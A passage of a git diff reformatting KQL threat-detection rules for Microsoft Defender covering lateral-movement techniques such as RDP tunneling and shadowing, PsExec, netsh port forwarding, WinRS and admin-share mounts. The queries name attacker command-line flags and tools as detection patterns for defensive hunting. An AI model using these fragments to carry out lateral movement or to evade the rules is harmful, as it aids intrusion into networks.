attack.t1090 -// False Positives: -// - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723) -// - Synergy Software KVM (https://symless.com/synergy) - -DeviceRegistryEvents +// Title: New PortProxy Registry Entry Added +// Author: Andreas Hunkeler (@Karneades) +// Date: 2021-06-22 +// Level: medium +// Description: Detects the modification of the PortProxy registry key which is used for port forwarding. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090 +// False Positives: +// - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723) +// - Synergy Software KVM (https://symless.com/synergy) + +DeviceRegistryEvents | where RegistryKey endswith "\\Services\\PortProxy\\v4tov4\\tcp*" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql b/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql index 4e94032f..2e236fde 100644 --- a/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql +++ b/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql @@ -1,13 +1,13 @@ -// Title: New Remote Desktop Connection Initiated Via Mstsc.EXE -// Author: frack113 -// Date: 2022-01-07 -// Level: medium -// Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. -// Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.001 -// False Positives: -// - WSL (Windows Sub System For Linux) - -DeviceProcessEvents +// Title: New Remote Desktop Connection Initiated Via Mstsc.EXE +// Author: frack113 +// Date: 2022-01-07 +// Level: medium +// Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. +// Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.001 +// False Positives: +// - WSL (Windows Sub System For Linux) + +DeviceProcessEvents | where ((ProcessCommandLine contains " -v:" or ProcessCommandLine contains " /v:" or ProcessCommandLine contains " –v:" or ProcessCommandLine contains " —v:" or ProcessCommandLine contains " ―v:") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql b/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql index 5808e874..e9ce9edc 100644 --- a/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql +++ b/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql @@ -1,13 +1,13 @@ -// Title: Outbound RDP Connections Over Non-Standard Tools -// Author: Markus Neis -// Date: 2019-05-15 -// Level: high -// Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. -// An initial baseline is required before using this utility to exclude third party RDP tooling that you might use. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.001, car.2013-07-002 -// False Positives: -// - Third party RDP tools - -DeviceNetworkEvents +// Title: Outbound RDP Connections Over Non-Standard Tools +// Author: Markus Neis +// Date: 2019-05-15 +// Level: high +// Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. +// An initial baseline is required before using this utility to exclude third party RDP tooling that you might use. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.001, car.2013-07-002 +// False Positives: +// - Third party RDP tools + +DeviceNetworkEvents | where RemotePort == 3389 and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\mstsc.exe", "C:\\Windows\\SysWOW64\\mstsc.exe")))) and (not(((InitiatingProcessFolderPath endswith "\\Avast Software\\Avast\\AvastSvc.exe" or InitiatingProcessFolderPath endswith "\\Avast\\AvastSvc.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dns.exe" and Protocol =~ "udp" and LocalPort == 53) or InitiatingProcessFolderPath =~ "" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Mozilla Firefox\\firefox.exe" or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\Ranger\\SentinelRanger.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" or InitiatingProcessFolderPath endswith "\\RDCMan.exe" or (InitiatingProcessFolderPath endswith "\\FSAssessment.exe" or InitiatingProcessFolderPath endswith "\\FSDiscovery.exe" or InitiatingProcessFolderPath endswith "\\MobaRTE.exe" or InitiatingProcessFolderPath endswith "\\mRemote.exe" or InitiatingProcessFolderPath endswith "\\mRemoteNG.exe" or InitiatingProcessFolderPath endswith "\\Passwordstate.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager64.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManagerFree.exe" or InitiatingProcessFolderPath endswith "\\RSSensor.exe" or InitiatingProcessFolderPath endswith "\\RTS2App.exe" or InitiatingProcessFolderPath endswith "\\RTSApp.exe" or InitiatingProcessFolderPath endswith "\\spiceworks-finder.exe" or InitiatingProcessFolderPath endswith "\\Terminals.exe" or InitiatingProcessFolderPath endswith "\\ws_TunnelService.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\TSplus\\Java\\bin\\HTML5service.exe", "C:\\Program Files (x86)\\TSplus\\Java\\bin\\HTML5service.exe")) or InitiatingProcessFolderPath =~ ""))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql index 3ec120ed..1d16c985 100644 --- a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql +++ b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql @@ -1,10 +1,10 @@ -// Title: Potential DCOM InternetExplorer.Application DLL Hijack -// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga -// Date: 2020-10-12 -// Level: critical -// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003 - -DeviceFileEvents +// Title: Potential DCOM InternetExplorer.Application DLL Hijack +// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga +// Date: 2020-10-12 +// Level: critical +// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003 + +DeviceFileEvents | where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\Internet Explorer\\iertutil.dll" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql index 1a20a4ef..ab64fcea 100644 --- a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql +++ b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql @@ -1,10 +1,10 @@ -// Title: Potential DCOM InternetExplorer.Application DLL Hijack - Image Load -// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga -// Date: 2020-10-12 -// Level: critical -// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003 - -DeviceImageLoadEvents +// Title: Potential DCOM InternetExplorer.Application DLL Hijack - Image Load +// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga +// Date: 2020-10-12 +// Level: critical +// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003 + +DeviceImageLoadEvents | where FolderPath endswith "\\Internet Explorer\\iertutil.dll" and InitiatingProcessFolderPath endswith "\\Internet Explorer\\iexplore.exe" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql b/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql index e3c243d4..f21b7efb 100644 --- a/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql +++ b/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql @@ -1,10 +1,10 @@ -// Title: Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp -// Author: Aaron Stratton -// Date: 2023-11-13 -// Level: high -// Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. -// MITRE Tactic: Lateral Movement -// Tags: attack.t1021.003, attack.lateral-movement - -DeviceProcessEvents +// Title: Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp +// Author: Aaron Stratton +// Date: 2023-11-13 +// Level: high +// Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. +// MITRE Tactic: Lateral Movement +// Tags: attack.t1021.003, attack.lateral-movement + +DeviceProcessEvents | where ((ProcessVersionInfoOriginalFileName in~ ("foxprow.exe", "schdplus.exe", "winproj.exe")) or (FolderPath endswith "\\foxprow.exe" or FolderPath endswith "\\schdplus.exe" or FolderPath endswith "\\winproj.exe")) and InitiatingProcessFolderPath endswith "\\excel.exe" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql b/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql index 13fef618..10d4e84c 100644 --- a/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql +++ b/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql @@ -1,12 +1,12 @@ -// Title: Potential Lateral Movement via Windows Remote Shell -// Author: Liran Ravich -// Date: 2025-10-22 -// Level: medium -// Description: Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.006 -// False Positives: -// - Legitimate use of WinRM within the organization - -DeviceProcessEvents +// Title: Potential Lateral Movement via Windows Remote Shell +// Author: Liran Ravich +// Date: 2025-10-22 +// Level: medium +// Description: Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.006 +// False Positives: +// - Legitimate use of WinRM within the organization + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\winrshost.exe" and (not(FolderPath =~ "C:\\Windows\\System32\\conhost.exe")) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql b/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql index 86dc13f4..5712cb83 100644 --- a/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql +++ b/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql @@ -1,10 +1,10 @@ -// Title: Potential MSTSC Shadowing Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2020-01-24 -// Level: high -// Description: Detects RDP session hijacking by using MSTSC shadowing -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1563.002 - -DeviceProcessEvents +// Title: Potential MSTSC Shadowing Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2020-01-24 +// Level: high +// Description: Detects RDP session hijacking by using MSTSC shadowing +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1563.002 + +DeviceProcessEvents | where ProcessCommandLine contains "noconsentprompt" and ProcessCommandLine contains "shadow:" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql b/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql index a709c271..a9e6a2a6 100644 --- a/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql +++ b/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql @@ -1,10 +1,10 @@ -// Title: Potential Remote Desktop Tunneling -// Author: Tim Rauch, Elastic (idea) -// Date: 2022-09-27 -// Level: medium -// Description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021 - -DeviceProcessEvents +// Title: Potential Remote Desktop Tunneling +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-27 +// Level: medium +// Description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021 + +DeviceProcessEvents | where ProcessCommandLine contains ":3389" and (ProcessCommandLine contains " -L " or ProcessCommandLine contains " -P " or ProcessCommandLine contains " -R " or ProcessCommandLine contains " -pw " or ProcessCommandLine contains " -ssh ") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql b/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql index 2af67c7b..1f5d0adf 100644 --- a/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql +++ b/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql @@ -1,12 +1,12 @@ -// Title: Privilege Escalation via Named Pipe Impersonation -// Author: Tim Rauch, Elastic (idea) -// Date: 2022-09-27 -// Level: high -// Description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021 -// False Positives: -// - Other programs that cause these patterns (please report) - -DeviceProcessEvents +// Title: Privilege Escalation via Named Pipe Impersonation +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-27 +// Level: high +// Description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021 +// False Positives: +// - Other programs that cause these patterns (please report) + +DeviceProcessEvents | where (ProcessCommandLine contains "echo" and ProcessCommandLine contains ">" and ProcessCommandLine contains "\\\\.\\pipe\\") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql b/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql index 02bac7ad..91e44e54 100644 --- a/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql +++ b/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql @@ -1,12 +1,12 @@ -// Title: PSEXEC Remote Execution File Artefact -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-21 -// Level: high -// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.privilege-escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: PSEXEC Remote Execution File Artefact +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-21 +// Level: high +// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.privilege-escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029 +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql index 889509a6..f4985f03 100644 --- a/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql +++ b/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql @@ -1,12 +1,12 @@ -// Title: RDP Port Forwarding Rule Added Via Netsh.EXE -// Author: Florian Roth (Nextron Systems), oscd.community -// Date: 2019-01-29 -// Level: high -// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090 -// False Positives: -// - Legitimate administration activity - -DeviceProcessEvents +// Title: RDP Port Forwarding Rule Added Via Netsh.EXE +// Author: Florian Roth (Nextron Systems), oscd.community +// Date: 2019-01-29 +// Level: high +// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090 +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents | where (ProcessCommandLine contains " i" and ProcessCommandLine contains " p" and ProcessCommandLine contains "=3389" and ProcessCommandLine contains " c") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql b/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql index d82633f6..14e734c2 100644 --- a/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql +++ b/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql @@ -1,12 +1,12 @@ -// Title: Rundll32 Execution Without Parameters -// Author: Bartlomiej Czyz, Relativity -// Date: 2021-01-31 -// Level: high -// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002 -// False Positives: -// - False positives may occur if a user called rundll32 from CLI with no options - -DeviceProcessEvents +// Title: Rundll32 Execution Without Parameters +// Author: Bartlomiej Czyz, Relativity +// Date: 2021-01-31 +// Level: high +// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002 +// False Positives: +// - False positives may occur if a user called rundll32 from CLI with no options + +DeviceProcessEvents | where ProcessCommandLine in~ ("rundll32.exe", "rundll32") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql b/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql index 271a9cbf..5bc3c6eb 100644 --- a/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql +++ b/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Csi.exe Usage -// Author: Konstantin Grishchenko, oscd.community -// Date: 2020-10-17 -// Level: medium -// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe' -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.execution, attack.t1072, attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate usage by software developers - -DeviceProcessEvents +// Title: Suspicious Csi.exe Usage +// Author: Konstantin Grishchenko, oscd.community +// Date: 2020-10-17 +// Level: medium +// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe' +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.execution, attack.t1072, attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage by software developers + +DeviceProcessEvents | where ProcessVersionInfoCompanyName =~ "Microsoft Corporation" and ((FolderPath endswith "\\csi.exe" or FolderPath endswith "\\rcsi.exe") or (ProcessVersionInfoOriginalFileName in~ ("csi.exe", "rcsi.exe"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql b/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql index 7dc91359..912a0f06 100644 --- a/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql +++ b/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql @@ -1,10 +1,10 @@ -// Title: Suspicious RDP Redirect Using TSCON -// Author: Florian Roth (Nextron Systems) -// Date: 2018-03-17 -// Level: high -// Description: Detects a suspicious RDP session redirect using tscon.exe -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1563.002, attack.t1021.001, car.2013-07-002 - -DeviceProcessEvents +// Title: Suspicious RDP Redirect Using TSCON +// Author: Florian Roth (Nextron Systems) +// Date: 2018-03-17 +// Level: high +// Description: Detects a suspicious RDP session redirect using tscon.exe +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1563.002, attack.t1021.001, car.2013-07-002 + +DeviceProcessEvents | where ProcessCommandLine contains " /dest:rdp-tcp#" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql b/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql index 38e1b84c..f3b5f281 100644 --- a/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql +++ b/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql @@ -1,10 +1,10 @@ -// Title: Suspicious SysAidServer Child -// Author: Florian Roth (Nextron Systems) -// Date: 2022-08-26 -// Level: medium -// Description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions) -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1210 - -DeviceProcessEvents +// Title: Suspicious SysAidServer Child +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-26 +// Level: medium +// Description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions) +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1210 + +DeviceProcessEvents | where InitiatingProcessCommandLine contains "SysAidServer" and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql b/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql index 0fd38a29..fc056b7f 100644 --- a/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql +++ b/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql @@ -1,10 +1,10 @@ -// Title: Suspicious UltraVNC Execution -// Author: Bhabesh Raj -// Date: 2022-03-04 -// Level: high -// Description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group) -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.g0047, attack.t1021.005 - -DeviceProcessEvents +// Title: Suspicious UltraVNC Execution +// Author: Bhabesh Raj +// Date: 2022-03-04 +// Level: high +// Description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group) +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.g0047, attack.t1021.005 + +DeviceProcessEvents | where ProcessCommandLine contains "-autoreconnect " and ProcessCommandLine contains "-connect " and ProcessCommandLine contains "-id:" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql b/KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql index 642e7576..af97e23b 100644 --- a/KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql +++ b/KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql @@ -1,12 +1,12 @@ -// Title: Windows Admin Share Mount Via Net.EXE -// Author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga -// Date: 2020-10-05 -// Level: medium -// Description: Detects when an admin share is mounted using net.exe -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.002 -// False Positives: -// - Administrators - -DeviceProcessEvents +// Title: Windows Admin Share Mount Via Net.EXE +// Author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga +// Date: 2020-10-05 +// Level: medium +// Description: Detects when an admin share is mounted using net.exe +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002 +// False Positives: +// - Administrators + +DeviceProcessEvents | where (ProcessCommandLine contains " use " and (ProcessCommandLine contains " \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql b/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql index 1658894f..ee0091cf 100644 --- a/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql +++ b/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql @@ -1,10 +1,10 @@ -// Title: Windows Internet Hosted WebDav Share Mount Via Net.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-21 -// Level: high -// Description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.002 - -DeviceProcessEvents +// Title: Windows Internet Hosted WebDav Share Mount Via Net.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-21 +// Level: high +// Description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002 + +DeviceProcessEvents | where (ProcessCommandLine contains " use " and ProcessCommandLine contains " http") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql b/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql index b32fbc80..1baca70e 100644 --- a/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql +++ b/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql @@ -1,12 +1,12 @@ -// Title: Windows Share Mount Via Net.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-02 -// Level: low -// Description: Detects when a share is mounted using the "net.exe" utility -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.002 -// False Positives: -// - Legitimate activity by administrators and scripts - -DeviceProcessEvents +// Title: Windows Share Mount Via Net.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-02 +// Level: low +// Description: Detects when a share is mounted using the "net.exe" utility +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002 +// False Positives: +// - Legitimate activity by administrators and scripts + +DeviceProcessEvents | where (ProcessCommandLine contains " use " or ProcessCommandLine contains " \\\\") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/winrs_local_command_execution.kql b/KQL/rules/Lateral Movement/winrs_local_command_execution.kql index 6dad275c..5db95591 100644 --- a/KQL/rules/Lateral Movement/winrs_local_command_execution.kql +++ b/KQL/rules/Lateral Movement/winrs_local_command_execution.kql @@ -1,13 +1,13 @@ -// Title: Winrs Local Command Execution -// Author: Liran Ravich, Nasreddine Bencherchali -// Date: 2025-10-22 -// Level: high -// Description: Detects the execution of Winrs.exe where it is used to execute commands locally. -// Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.defense-evasion, attack.t1021.006, attack.t1218 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Winrs Local Command Execution +// Author: Liran Ravich, Nasreddine Bencherchali +// Date: 2025-10-22 +// Level: high +// Description: Detects the execution of Winrs.exe where it is used to execute commands 